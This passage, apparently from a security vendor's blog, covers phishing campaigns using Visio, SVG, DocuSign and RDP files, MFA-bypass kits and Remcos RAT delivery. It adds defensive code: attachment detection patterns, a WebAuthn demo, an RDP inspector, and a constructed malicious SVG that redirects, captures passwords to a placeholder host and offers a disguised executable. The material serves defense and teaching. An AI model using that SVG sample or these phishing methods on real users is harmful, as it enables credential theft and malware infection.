It is also important to ensure that all lawyers and support staff are made aware of the latest threats and receive regular cybersecurity awareness training. TitanHQ offers a comprehensive security awareness training platform (SafeTitan) and phishing simulator that makes it easy to create effective, ongoing training programs that incorporate training material on the latest threats. Give the TitanHQ team a call today for more information on these and other cybersecurity solutions and for advice on improving your cybersecurity defenses against the most common attack vectors.

Phishing Campaign Uses Visio File Attachments for Credential Theft

A new phishing scam uses Microsoft Visio files to bypass phishing defenses to steal Microsoft 365 credentials. Microsoft Visio is a diagramming and vector graphics application used to create a variety of diagrams, including building plans, data flow diagrams, organizational charts, and flowcharts. While the software is widely used by businesses, Visio files are unlikely to feature heavily in security awareness training courses as they are not commonly used in phishing campaigns or for malware delivery. Security awareness training tends to focus on the most common file types such as documents, spreadsheets, and executable files. Unfamiliarity with the file type should mean employees exercise extreme caution; however, since Visio is part of the Microsoft 365 family, the files may be trusted and opened.

To increase the chance of that, this campaign uses compromised accounts to send the phishing emails. By using trusted accounts there is less chance of the emails being identified by email security solutions as malicious, since the emails are likely to pass reputation and authentication checks. It also increases the chance of the emails being opened, as employees are trained to be suspicious of emails from unknown senders and generally trust emails from known senders. Like countless other phishing campaigns, tried and tested lures are used to get the recipient to open the attached .vsdx file. In this campaign the phishing emails masquerade as purchase orders and business proposals. Also observed in this campaign is the use of an Outlook message attachment, with that message including the malicious Visio file. Some emails use hyperlinks instead, which direct the recipient to a SharePoint page hosting the Visio file. The latter helps to ensure that the email message is not blocked by email security solutions, which typically trust SharePoint URLs.

If the Visio file is opened, the user will be presented with branding that makes the file appear legitimate and they are advised to click an embedded link to view the contents of the file. The user is told to hold down the CTRL key when they click the link – an additional measure for evading security solutions. That link directs the user to a URL that hosts a spoofed login page that prompts them to enter their Microsoft credentials, which are captured by the threat actor.

While the use of Visio files for phishing is not common, there has been an increase in the use of these files as threat actors look for more reliable methods of phishing. It is certainly worthwhile ensuring that these file types are covered in your security awareness training programs and phishing simulations. While it is important to train employees to be aware of the latest tactics, techniques, and procedures used by threat actors to steal credentials, having an advanced email security solution in place can ensure that these malicious emails do not reach their targets. One of the easiest ways to block the threat, given that these are not commonly used files, is to configure your spam filter to block/quarantine emails containing .vsdx attachments, and certainly to do so for users who do not need to use these file types for work purposes. This is straightforward with SpamTitan (see our Help section).

If it is not practical to block these file types, SpamTitan does incorporate a variety of safeguards for preventing the delivery of malicious messages, including email sandboxing for deep analysis of file attachments to identify malicious URLs (and malware) and machine learning to identify emails that deviate from the messages typically received by the user/business. These features are critical, since the messages in this campaign are sent from compromised email accounts that are potentially trusted.

If you are not a SpamTitan user, give the TitanHQ team a call to find out more about the solution and why so many businesses are switching to SpamTitan for email security and check out this post, which highlights SpamTitan’s 100% malware and phishing block rate in recent tests.

SVG Image Files Being Used for Phishing and Malware Delivery

Cybercriminals are increasingly leveraging SVG files in their email campaigns. These file attachments have been used as part of convincing campaigns that have fooled many end users into disclosing their credentials or installing malware.

SVG files, or Scalable Vector Graphics files to give them their full name, differ from standard image files such as BMP, JPG, and PNG files. Vector graphics are constructed using mathematical formulas that establish points on a grid, rather than specific blocks of color (pixels). The advantage of vector graphics files is that they can be scaled infinitely with no loss of resolution, something that cannot be done with pixel-based images. Vector files are often used for logos, as they can be scaled up easily to be used in billboards with no loss of resolution, and they are increasingly being used on the web as the images will display correctly regardless of the size of the browser window or screen.

SVG is an incredibly versatile file format that can incorporate elements other than the image description; for instance, SVG files can embed HTML. It is possible to create an SVG image file that incorporates HTML and executes JavaScript on loading, redirecting users to a malicious website such as a phishing landing page. Images can be created that incorporate clickable download buttons, which will download payloads from a remote URL. An end user could easily be tricked into downloading a file with a double extension that appears to be a PDF file but is actually a malware executable.

Some of the recently intercepted phishing emails have included an SVG file that displays an image of an Excel spreadsheet. Since the spreadsheet is an image, the user cannot interact with it, but it includes an embedded form that mimics the Microsoft 365 login prompt. If the user enters their credentials into that form, they are transmitted to the threat actor. One of the problems with this type of file format is it is not generally blocked by anti-spam software, so is likely to be delivered to inboxes.

While SVG and other vector graphics file formats are invaluable for design and can be found extensively on the web, they are not generally used for image sharing, so the easiest way to protect against these malicious campaigns is to configure your spam filtering service to block or quarantine emails containing SVG file attachments, at least for employees who do not usually work with these file formats. If you have a cloud-based anti-spam service that incorporates email sandboxing, where attachments are sent for deep analysis, it is possible to detect SVG files that incorporate malicious JavaScript. Since the use of these file formats is increasing, it is important to make your employees aware of the threat through security awareness training. Emails with SVG file attachments should also be incorporated into your phishing simulations to determine whether employees open these files. Both are easy with the SafeTitan security awareness training and phishing simulation platform.
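Both the Visio section above and this one come down to the same gateway control: quarantine uncommon attachment types for the users who do not need them, and for the users who do, look inside the file. The following is an added example, not SpamTitan’s implementation or configuration: a per-group attachment policy covering .vsdx and .svg, a double-extension check for the PDF-that-is-an-executable case, and an SVG inspector that reports the active content described above (scripts, event handlers, embedded HTML via foreignObject, external or javascript: hrefs, and download links). The group names, the blocked-extension lists and both sample SVGs are constructed.

```python
"""Attachment policy by user group, plus inspection of SVG files for active content.

Added example (not SpamTitan code). Assumptions: the gateway knows each
recipient's group, and the blocked-extension lists below are constructed
policy, not a vendor default. Sample SVGs are constructed for the example.
"""
import gzip
import re
import xml.etree.ElementTree as ET

BLOCKED_BY_GROUP = {
    "default": {".vsdx", ".vsd", ".svg", ".svgz"},   # most staff need neither
    "design": {".vsdx", ".vsd"},                      # designers keep SVG
    "engineering": {".svg", ".svgz"},                 # Visio users keep Visio
}
# "Invoice.pdf.exe": a document extension hiding an executable one.
DOUBLE_EXT = re.compile(
    r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|txt)\.(exe|scr|js|vbs|bat|cmd|msi|ps1)$", re.I)
# Elements that make an SVG a program or a page rather than a picture.
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "form", "input", "embed", "object"}


def _local(name: str) -> str:
    """Strip an XML namespace prefix: '{http://...}href' -> 'href'."""
    return name.rsplit("}", 1)[-1]


def inspect_svg(data: bytes) -> list:
    """Return a list of findings; an empty list means a plain static image."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable SVG: {exc}"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, val in el.attrib.items():
            a, v = _local(attr).lower(), val.strip().lower()
            if a.startswith("on"):                       # onload, onclick, ...
                findings.append(f"event handler {a} on <{tag}>")
            elif a == "href" and v.startswith(("javascript:", "http://", "https://")):
                findings.append(f"external or script href on <{tag}>: {val}")
            elif a == "download":
                findings.append(f"download link on <{tag}>: {val}")
    return findings


def attachment_verdict(filename: str, data: bytes, group: str = "default"):
    """Return (verdict, reasons) where verdict is block, quarantine or deliver."""
    name = filename.lower()
    ext = ("." + name.rsplit(".", 1)[-1]) if "." in name else ""
    if DOUBLE_EXT.search(name):
        return "block", ["double extension hides an executable"]
    if ext in BLOCKED_BY_GROUP.get(group, BLOCKED_BY_GROUP["default"]):
        return "quarantine", [f"{ext} attachments are not permitted for group '{group}'"]
    if ext in (".svg", ".svgz"):                         # allowed for this group: inspect
        if ext == ".svgz":
            try:
                data = gzip.decompress(data)
            except OSError:
                return "quarantine", ["svgz that does not decompress"]
        findings = inspect_svg(data)
        if findings:
            return "quarantine", findings
    return "deliver", []


# Constructed: an ordinary static logo.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <rect width="10" height="10" fill="#1e88e5"/></svg>"""

# Constructed: the pattern described in the text, with placeholder hosts.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="go()">
  <script>function go(){location.href='https://example.invalid/login'}</script>
  <foreignObject width="400" height="300">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://example.invalid/post">
      <input type="password" name="pw"/>
    </form>
  </foreignObject>
  <a xlink:href="https://example.invalid/Invoice.pdf.exe" download="Invoice.pdf.exe">
    <rect width="80" height="20"/></a>
</svg>"""

if __name__ == "__main__":
    print(attachment_verdict("diagram.vsdx", b"PK", "default"))
    print(attachment_verdict("logo.svg", BENIGN_SVG, "design"))
    print(attachment_verdict("invoice.svg", MALICIOUS_SVG, "design"))
```

The inspector is deliberately strict: a legitimate logo never needs a script, an event handler, a form or a download link, so any one of those is enough to hold the message for sandbox review rather than deliver it.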

DocuSign Abused in Massive Phishing Campaign

A large-scale phishing campaign has been identified that abuses the e-signature software DocuSign, a hugely popular software solution used to legally and securely sign digital documents and eliminate the time-consuming process of manually signing documents.

DocuSign uses “envelopes” to send documents to individuals for signing. These document containers may contain one or more documents that need to be signed, and the envelopes are sent via email. In this campaign, a bad actor abuses the DocuSign Envelopes API to create fake invoices, which are mass-distributed via email. The aim is to get the recipient of the invoice to sign it using DocuSign; the signed document is then used for the next phase of the scam, which typically involves sending it to the billing department for payment, with or without DocuSign. The invoices generated for this campaign are based on legitimate DocuSign templates and are generated through a legitimate DocuSign account. The invoices include legitimate branding for DocuSign and the company/product the threat actor is impersonating – such as Norton Internet Security, PayPal, and other big-name brands.

The problem for businesses with this campaign is the emails are sent from the genuine docusign[.]net domain, which means email security solutions are unlikely to block the messages since the domain is trusted. Since the emails appear to be legitimate invoices with genuine branding and the correct invoice amount for the product being spoofed, end users are likely to be tricked by the emails. The tactics used in this campaign are similar to others that have abused legitimate cloud-based services to bypass email security solutions, such as sending malicious URLs in documents hosted on Google Docs and Microsoft SharePoint.

The primary defense against these campaigns is security awareness training. Businesses need to make their employees aware of campaigns such as this, whose messages often bypass email security solutions and are likely to land in inboxes since they may not contain any malicious URLs or malware code and are sent from a legitimate, trusted domain. The workforce needs to be trained on cybersecurity best practices and told about the red flags in emails that are indicative of a scam. Training needs to be provided continuously to make employees aware of the latest scams, as bad actors are constantly refining their tactics, techniques, and procedures, and developing new ways to trick end users. The easiest way to do this is with a comprehensive security awareness training solution such as SafeTitan.

SafeTitan makes it easy to create training programs for different roles in the organization and automate these training programs to ensure training content is delivered in manageable chunks, with new content added and rolled out in response to the latest threats. These training programs should be augmented with phishing simulations. An email security solution with AI and machine-learning capabilities is also important, as standard spam software is not effective at identifying threats from legitimate and trusted cloud services. TitanHQ’s PhishTitan solution for Microsoft 365 has these capabilities and identifies the phishing emails that Microsoft often misses. PhishTitan scans inbound messages for malicious content, uses email sandboxing for detecting zero-day threats, adds banners to emails from external sources, and allows security teams to rapidly remediate identified threats throughout the entire email environment. In November 2024, Virus Bulletin assessed the engine that powers the SpamTitan spam filtering service and PhishTitan anti-phishing solution using around 125,000 emails. SpamTitan and PhishTitan blocked 100% of malware and 100% of phishing emails and only miscategorized 2 benign spam emails, demonstrating how effective these solutions are at blocking malicious emails.

For more information on improving your defenses against malicious email campaigns through cutting-edge email security and security awareness training, give the TitanHQ team a call today.

Multifactor Authentication Can Give a False Sense of Security

It is all too easy to place too much reliance on multifactor authentication (MFA) to protect against phishing attacks. In theory, if an employee is duped by a phishing email and their credentials are stolen, MFA should stop the threat actor from using those credentials to access the account, as they will not have the necessary additional authentication factor(s). The reality is somewhat different. While MFA can – and does – block many attacks where credentials have been obtained, it is far from infallible. MFA has made it much harder to compromise accounts but, in response, threat actors have developed new tactics to bypass MFA protections.

For example, there is a scam where an employee is contacted by an individual who claims to be from their IT department. The scammer tells them there is an issue with their account and they need to update their password. They are directed to a site where they are prompted to enter their password and enter the MFA code sent to their phone. The threat actor uses that information in real-time to access their account. Multiple campaigns have targeted IT helpdesk staff, with the threat actor impersonating an employee. They provide information to verify their identity (obtained in an earlier phase of the campaign) and ask to register a new device to receive their MFA codes.

Phishing-as-a-service (PhaaS) toolkits capable of defeating MFA can be purchased or rented on hacking forums and Telegram channels. They involve an adversary-in-the-middle (AitM) attack and use a reverse proxy between the victim and the legitimate portal for the credentials being sought. The user is directed to a login page that appears exactly as expected, as the user is logging into the genuine site. Unknown to the user, the attacker sits between them and the site and captures the credentials and the session cookie after MFA is successfully navigated. The attacker then has access to the account for the duration of the session cookie and can register a new device to receive future codes.

PhaaS kits are a serious threat and are proving popular with cybercriminals. Take the Rockstar 2FA kit for example, which is advertised for $200 for a 2-week subscription. The kit includes everything a phisher needs, including MFA bypass, login pages for targeting specific credentials, session cookie harvesting, fully undetectable (FUD) malicious links and link redirectors, a host of phishing templates, and an easy-to-use admin panel that allows tracking of phishing campaigns. The phishing URLs available are also hosted on legitimate services such as Google Docs Viewer, Microsoft OneDrive, and LiveAgent – sites commonly trusted by email security solutions. This is just one phishing kit. There are many being offered with similar capabilities.

The take-home message is that MFA, while important, can be bypassed. For maximum protection, phishing-resistant multifactor authentication should be used – e.g. smartcards or FIDO security keys. These MFA tools can be expensive to implement, so at the very least ensure that you have some form of MFA implemented and implement several other layers of defenses. An advanced spam filtering service such as SpamTitan is essential, as it can block phishing emails to ensure they do not reach end users. Review sites often rate SpamTitan as one of the best spam filters for business due to how easy the solution is to use and its excellent detection rate. In November 2024, in tests by Virus Bulletin, SpamTitan blocked 100% of malware and 100% of phishing emails out of a test involving around 125,000 messages. Previous assessments had a catch rate of more than 99.99%, demonstrating the reliability and accuracy of the solution.
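Why FIDO security keys are singled out as phishing-resistant, when a one-time code is not, comes down to origin binding, and that can be shown without a real key. The following is an added example, not from the original article and not a WebAuthn library: it models the two checks a relying party performs on an assertion, that the origin recorded in clientDataJSON is its own and that rpIdHash in authenticatorData is SHA-256 of its RP ID, and it models the browser refusing an rpId that does not match the page it loaded. Because the browser, not the user, fills in the origin, the reverse proxy in an AitM kit ends up with an assertion the genuine site rejects, and rewriting the origin breaks the signature. The relying party names, the proxy hostname and the challenge are constructed, and the signature is an HMAC stand-in for the key pair so the script runs offline.

```python
"""Origin binding: why a FIDO/WebAuthn assertion made on a proxy's page fails.

Added example, not from the article and not a real WebAuthn implementation.
The asymmetric signature is replaced by an HMAC keyed per relying party so the
script needs only the standard library; every name below is constructed.
"""
import hashlib
import hmac
import json
import os

RP_ID = "login.example.com"                 # constructed relying party ID
RP_ORIGIN = "https://login.example.com"     # the origin the RP expects to see


class Authenticator:
    """Toy security key: one secret per RP ID stands in for a key pair."""

    def __init__(self):
        self.keys = {}

    def register(self, rp_id: str) -> bytes:
        self.keys[rp_id] = os.urandom(32)
        return self.keys[rp_id]             # 'public key' given to the RP

    def get_assertion(self, rp_id: str, challenge: str, origin: str):
        """Sign over authenticatorData || SHA-256(clientDataJSON).

        clientDataJSON carries the origin the browser actually loaded."""
        client_data = json.dumps(
            {"type": "webauthn.get", "challenge": challenge, "origin": origin}).encode()
        auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01"   # rpIdHash || flags
        to_sign = auth_data + hashlib.sha256(client_data).digest()
        sig = hmac.new(self.keys[rp_id], to_sign, hashlib.sha256).digest()
        return client_data, auth_data, sig


def browser_get(auth: Authenticator, page_origin: str, rp_id: str, challenge: str):
    """Models the browser: the requested rpId must be the page's host or a
    registrable suffix of it, and the origin written into clientData is the
    page's real origin, whatever the page claims."""
    host = page_origin.split("://", 1)[1].split("/")[0]
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise PermissionError("SecurityError: rpId is not valid for this origin")
    if rp_id not in auth.keys:
        raise LookupError("no credential registered for this RP ID")
    return auth.get_assertion(rp_id, challenge, page_origin)


def rp_verify(public_key: bytes, challenge: str, client_data: bytes,
              auth_data: bytes, sig: bytes) -> bool:
    """Relying-party checks: type, challenge, origin, rpIdHash, then signature."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != challenge:
        return False
    if cd.get("origin") != RP_ORIGIN:                      # assertion made on another site
        return False
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False
    expected = hmac.new(public_key, auth_data + hashlib.sha256(client_data).digest(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


def demo() -> dict:
    """Legitimate login succeeds; the AitM relay fails at each layer it reaches."""
    auth = Authenticator()
    pk = auth.register(RP_ID)
    challenge = "c2VydmVyLXJhbmRvbQ"                        # constructed server nonce
    proxy_origin = "https://login-example.proxy.invalid"   # constructed AitM host

    legit = rp_verify(pk, challenge, *browser_get(auth, RP_ORIGIN, RP_ID, challenge))

    try:                                       # 1. browser refuses the real rpId on the proxy page
        browser_get(auth, proxy_origin, RP_ID, challenge)
        browser_refused = False
    except PermissionError:
        browser_refused = True

    # 2. Even without that check, clientData would name the proxy's origin.
    cd, ad, sig = auth.get_assertion(RP_ID, challenge, proxy_origin)
    origin_rejected = not rp_verify(pk, challenge, cd, ad, sig)

    # 3. Rewriting the origin changes SHA-256(clientDataJSON), so the signature fails.
    forged = cd.replace(proxy_origin.encode(), RP_ORIGIN.encode())
    forgery_rejected = not rp_verify(pk, challenge, forged, ad, sig)

    return {"legit": legit, "browser_refused": browser_refused,
            "origin_rejected": origin_rejected, "forgery_rejected": forgery_rejected}


if __name__ == "__main__":
    print(demo())
```

Contrast this with a TOTP or SMS code: nothing in the code says which site it was typed into, so the proxy simply forwards it. With a FIDO assertion the site’s identity is part of what gets signed, which is the property “phishing-resistant” refers to.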

Another layer of protection can be provided by a web filter, which will block attempts to visit known malicious websites, such as those used for phishing and malware distribution. WebTitan provides time-of-click protection, as does TitanHQ’s PhishTitan product – an anti-phishing solution specifically developed to protect M365 accounts against phishing by augmenting Microsoft’s controls to catch the phishing emails that EOP and Defender miss.

Technical defenses are important, but so too is workforce training. Through regular security awareness training and phishing simulations, employees can be taught cybersecurity best practices and how to identify and avoid scam emails. If you want to improve your defenses against phishing and malware, give the TitanHQ team a call and have a chat about your options. All TitanHQ solutions are easy to use, are available on a free trial, and full product support is provided during that trial.

Watch Out for Holiday Season & Black Friday Scams

As consumers wait patiently for Black Friday to snaffle a bargain or two, scammers are hard at work perfecting their Black Friday scams and getting ahead of the game by offering amazing deals via email. In the run-up to Black Friday, Cyber Monday, and throughout the holiday season, everyone should be wary of scams and spam emails. The superb offers and hugely discounted prices are not always what they seem. Most are scams.

There are Black Friday and Cyber Monday deals aplenty, with bricks and mortar and online retailers vying to get your business to kick start the holiday season shopping bonanza. Rather than being confined to the weekend, many retailers have offers over an extended period, and marketing for those deals starts well in advance. Black Friday deals seem to be taking over much of November. While there are bargains to be had, even the incredible prices being offered by genuine retailers may not be quite as good as they seem. While Black Friday deals are touted as being the lowest prices of the year, research suggests that is not necessarily the case. According to the consumer group Which? it is common for prices to be inflated in the run-up to Black Friday to make the discounts seem bigger, and in some cases, the price that a retailer claims a product has been reduced from has never been offered in the previous 12 months. It pays to do some research before you buy.

As far as online shopping goes, it is important to visit your favorite retailers’ websites directly and, as a general rule of thumb, never respond to any offers received by email by clicking links. If you get an email from a retailer advising you of a Black Friday deal, visit their website using your bookmark or by typing in the URL. If the offer is available it should be detailed on the website. This is important as the majority of Black Friday emails are scams. According to a recent analysis by Bitdefender – the company that powers the SpamTitan email sandbox – 77% of Black Friday-themed spam were scams, a 7% increase from 2023. Many of these scam emails impersonate big-name brands and offer impressive but fake discounts on products and services. They often lead to financial loss, data theft, and malware infections.

Black Friday scams include offering top-name brands at heavily discounted prices, but actually mailing cheap counterfeit goods or not mailing any product at all. Big-name brands have been impersonated in spam emails that include an attachment that purports to be a shipping confirmation, confirming that orders are ready for shipment when the attachments direct users to websites where they are asked to disclose their credentials or the attachments install malware.

At this time of year there is a surge in survey scams, where consumers are asked to take part in surveys in exchange for a discount or voucher, and after completing the survey are asked to disclose sensitive information that can be used directly for fraud or spear phishing campaigns. If you receive unwanted marketing communications from genuine retailers, you can use the unsubscribe option to update your preferences, but make sure you carefully check the destination of the unsubscribe button and the sender’s email address to confirm the communication is from a legitimate retailer.

If you receive spam emails, the unsubscribe option should be avoided. Using the unsubscribe option lets the scammer know that the account is active, and all that is likely to happen is you will receive even more spam. Far better is to mark the email as spam and block the sender. Clicking an unsubscribe option in an email may direct you to a site where a vulnerability is exploited to download malware.

Businesses should ensure they have an effective spam filter, and it is never more important than in November, December, and January, when spammers are highly active. At TitanHQ, we offer products that provide exceptional protection against spam, scams, phishing emails, and malware. In recent independent tests by Virus Bulletin, the engine that powers the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 achieved a 100% phishing catch rate, a 100% malware catch rate, and a spam catch rate in excess of 99.9% in the November 2024 results. These follow overall scores in excess of 99.99% for blocking spam, phishing, and malware earlier in the year, demonstrating that these email security products provide excellent and reliable protection against malicious and spam emails.

TitanHQ Achieves 100% Phishing and Malware Catch Rate in November

TitanHQ is thrilled to announce that the engine that powers its email security solutions – SpamTitan and PhishTitan – achieved an incredible 100% catch rate for phishing emails and malware in November 2024 in independent tests by Virus Bulletin.

Virus Bulletin is a testing and certification body that has an excellent reputation within the information security community. Virus Bulletin performs independent tests of security solutions and has been reviewing, benchmarking, and issuing certifications for security products for more than 2 decades.

The spam, malware, and phishing identification tests are conducted over a 16-day period each month, with the final results published each quarter. For the past two quarters, TitanHQ’s email security solutions have achieved VBSpam+ certification, and the results from October and November indicate SpamTitan email security and the PhishTitan anti-phishing solutions are on track to receive their third consecutive quarterly VBSpam+ certification.

The interim results for November are based on an evaluation of almost 125,000 emails. TitanHQ’s solutions correctly identified all malware and phishing emails over that period, and it was nearly a clean sweep of 100% scores; however, there was a narrow miss on blocking non-malicious spam emails, as while the vast majority of spam emails were correctly identified, 2 spam emails were unfortunately miscategorized.

The flawless results for malware blocking and phishing identification by TitanHQ’s cloud-based anti-spam software clearly demonstrate the superb reliability and effectiveness of TitanHQ’s email security solutions and validate what our customers already know – that you can rely on TitanHQ to keep your email accounts free from threats.

“We are thrilled to have significantly outperformed our main competitors and surpassed the industry average,” said Ronan Kavanagh, CEO at TitanHQ. “Our unwavering commitment to providing unmatched email security is evident in these results, and we remain dedicated to protecting our clients from evolving cyber threats.”

In addition to providing a cutting-edge, easy to use, email filtering service, TitanHQ’s cybersecurity portfolio also includes a comprehensive security awareness training and phishing simulation platform – SafeTitan; a DNS-based web filtering solution for blocking Internet threats and controlling internet access – WebTitan; an easy-to-use and cost-effective email archiving solution – ArcTitan; and an email encryption solution for securing sensitive data – EncryptTitan.

All TitanHQ solutions are cloud-based and easy to implement and use, even by individuals with little technical expertise. These solutions can be used by businesses of all sizes and TitanHQ also offers anti-spam solutions for managed service providers to allow them to provide comprehensive security services to their clients.

For more information about these solutions or joining our partner program, give the TitanHQ team a call today and be sure to check out these anti-spam tips.

Excel File Attachments Used in Phishing Campaign to Deliver Fileless Remote Access Trojan

A phishing campaign has been identified that uses purchase order-related lures and Excel file attachments to deliver the Remcos RAT, a commercially available malware variant that gives threat actors remote access to an infected device. The malware allows the threat actor to log keystrokes, record audio via the microphone, and take screenshots, and provides a foothold allowing an extensive compromise. Infection with the Remcos RAT invariably involves data theft and could lead to a ransomware attack and extortion.

Businesses with antivirus software installed are unlikely to be protected. While antivirus software is effective at detecting and neutralizing malware, the Remcos RAT is poorly detected because it is fileless malware that runs in memory and does not write files to disk. The campaign, detected by researchers at FortiGuard Labs, targets Windows users and starts with a phishing email that purports to be a purchase order and carries an encrypted, malicious Excel file attachment. The Excel file uses OLE objects to exploit an old vulnerability in Office, tracked as CVE-2017-0199. Successful exploitation of the vulnerability downloads an HTML Application (HTA) file, which is launched using mshta.exe. The file is heavily obfuscated to evade security solutions, and its function is to download and execute a binary, which uses process hollowing to download and run the Remcos RAT in memory.

The Remcos RAT is used to enumerate and terminate processes, execute commands, capture sensitive data, and download additional malware payloads. Since the Remcos RAT runs in memory, it will not survive a reboot. To achieve persistence, it runs the registry editor (reg.exe) to add a new auto-run entry to the Windows Registry so that it is launched after each reboot.

Since the initial contact is made via email, an advanced email security solution with email sandboxing and AI- and machine learning capabilities should ensure the email is identified as malicious and blocked to prevent delivery. Should the email be delivered and the attachment opened, end users are informed that the document is protected. They are presented with a blurred version of the Excel file and are told they need to enable editing to view the content – a red flag that should be identified by security-aware employees. If that red flag is missed, enabling content will trigger the exploitation of the vulnerability that ultimately delivers the Remcos RAT. Businesses with an advanced DNS-based web filter will have another layer of protection, as the URLs hosting the malicious files should be blocked.

TitanHQ offers cutting-edge cybersecurity solutions that provide exceptional protection against phishing, BEC, and malware attacks, blocking the initial emails and connections to malicious websites to prevent end users from viewing malicious emails (SpamTitan) and preventing malicious file downloads from the Internet (WebTitan). In November 2024 tests by Virus Bulletin, TitanHQ’s SpamTitan solution had a 100% phishing and malware block rate. TitanHQ also provides a comprehensive security awareness training platform (SafeTitan) to teach cybersecurity best practices and keep employees aware of the latest threats. The platform also incorporates a phishing simulator for reinforcing training. Give the TitanHQ team a call today for more information on TitanHQ solutions and how they can improve your defenses against email, web, SMS, and voice-based threats at your business.

A Russian APT Group is Conducting a Massive Spear Phishing Campaign

The notorious Russian advanced persistent threat (APT) group Midnight Blizzard (aka Cozy Bear, APT29) has been conducting a massive spear phishing campaign on targets in the United Kingdom, Europe, Australia, and Japan. Midnight Blizzard is a hacking group with strong links to Russia’s Foreign Intelligence Service (SVR) which engages in espionage of foreign interests and seeks persistent access to accounts and devices to steal information of interest to the SVR. The latest campaign is a highly targeted information-gathering exercise that was first observed on October 22, 2024.

While Midnight Blizzard’s spear phishing attacks are usually conducted on government officials and individuals in non-governmental organizations (NGOs), individuals in academia and other sectors have also been targeted. The spear phishing attacks were identified by Microsoft Threat Intelligence which reports that thousands of emails have been sent to more than 100 organizations and the campaign is ongoing. While spear phishing is nothing new, Midnight Blizzard has adopted a new tactic in these attacks and is sending a signed Remote Desktop Protocol (RDP) configuration file as an email attachment, with a variety of lures tailored to the individual being targeted. Some of the intercepted emails impersonated Microsoft, others impersonated cloud service providers, and several of the emails used lures related to zero trust. The email addresses used in this campaign have been previously compromised in other Midnight Blizzard campaigns.

Amazon has also reported that it detected phishing emails that impersonated Amazon Web Services (AWS), attempting to trick the recipients into thinking AWS domains were used; however, the campaign did not seek AWS credentials, as Midnight Blizzard is targeting Windows credentials. Amazon immediately started the process of seizing the domains used by Midnight Blizzard to impersonate AWS and that process is ongoing.

RDP files contain automatic settings and resource mappings and are created when a successful connection to an RDP server occurs. The attached RDP files are signed with a Let’s Encrypt certificate and extend features and resources of the local system to a remote server under the attacker’s control. If the RDP file is executed, a connection is made to a server controlled by Midnight Blizzard, and the targeted user’s local device resources are bidirectionally mapped to the server.

The server is sent resources including logical hard disks, clipboard contents, printers, connected devices, authentication features, and Windows operating system facilities. The connection allows the attacker to install malware, which is set to execute via AutoStart folders, steal credentials, and download other tools to the user’s device, including remote access trojans to ensure that access to the targeted system is maintained when the RDP session is closed.

Since the emails were sent from email addresses at legitimate organizations, they are unlikely to be flagged as malicious by the reputation checks in anti-spam software, although they may be detected by more advanced anti-spam services that incorporate machine learning and AI-based detection mechanisms and email sandboxing. You should configure your spam and antivirus filter to block emails containing RDP files and other executable files, and configure your firewall to block outbound RDP connection attempts to external or public networks. Multifactor authentication should be configured on all accounts to prevent compromised credentials from granting access, and consider using your endpoint security software to block executable files from running if they are not on a trusted list. Also, ensure that downloaded files are scanned using antivirus software. A web filter can provide added protection against malicious file downloads from the internet.
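The resource mappings described above are ordinary settings inside the .rdp file, so a mail gateway or analyst can read them out before anyone double-clicks the attachment. The following is an added example, not code from the page or from TitanHQ: it parses an .rdp file in its real "name:type:value" format and reports which settings hand local drives, devices, clipboard, printers and smart cards to the remote host. The sample file, its host name and its signature value are constructed placeholders.

```python
"""Added example (not TitanHQ code): inspect an .rdp attachment for the settings that
hand local resources to the remote host, so an analyst can see why it should be blocked.
The sample file below is constructed; host name and signature are placeholders."""

# Constructed .rdp content in the real file format: one "name:type:value" line per setting
# ("i" = integer, "s" = string). The host is a placeholder, not a real indicator.
SAMPLE_RDP = """\
full address:s:rdp.example.invalid:3389
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
drivestoredirect:s:*
devicestoredirect:s:*
remoteapplicationmode:i:0
signature:s:PLACEHOLDER-SIGNATURE-BLOB
"""

# Settings that map the victim's local resources into the remote session.
RISKY_SETTINGS = {
    "drivestoredirect": "local drives mapped to the remote host",
    "devicestoredirect": "plug-and-play devices mapped to the remote host",
    "redirectclipboard": "clipboard shared with the remote host",
    "redirectprinters": "printers shared with the remote host",
    "redirectsmartcards": "smart cards / authentication devices shared with the remote host",
}


def parse_rdp(text):
    """Parse 'name:type:value' lines into {name: (type, value)}; values may contain ':'."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue  # not a setting line; ignore it
        name, typ, value = parts
        settings[name.strip().lower()] = (typ.strip(), value.strip())
    return settings


def _enabled(typ, value):
    # Integer settings are on when non-zero; string settings are on when non-empty.
    if typ == "i":
        return value not in ("", "0")
    return value != ""


def assess_rdp(text):
    """Return the remote host, the resource-redirection findings, and whether the file is signed."""
    settings = parse_rdp(text)
    host = settings.get("full address", ("s", ""))[1]
    findings = [why for name, why in RISKY_SETTINGS.items()
                if name in settings and _enabled(*settings[name])]
    return {
        "host": host,
        "findings": findings,
        # A valid signature only proves who signed the file, not that the host is trustworthy.
        "signed": "signature" in settings,
        # Any file that opens an outbound session to an unknown host is worth holding back.
        "quarantine": bool(findings) or bool(host),
    }


if __name__ == "__main__":
    report = assess_rdp(SAMPLE_RDP)
    print(f"connects to {report['host']} (signed={report['signed']})")
    for finding in report["findings"]:
        print(" -", finding)
```

The point of the `signed` flag is the one the campaign relies on: a certificate makes Windows show a cleaner prompt, but it says nothing about where the session goes or what it redirects, so the decision should rest on the host and the redirection settings, not on the signature.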

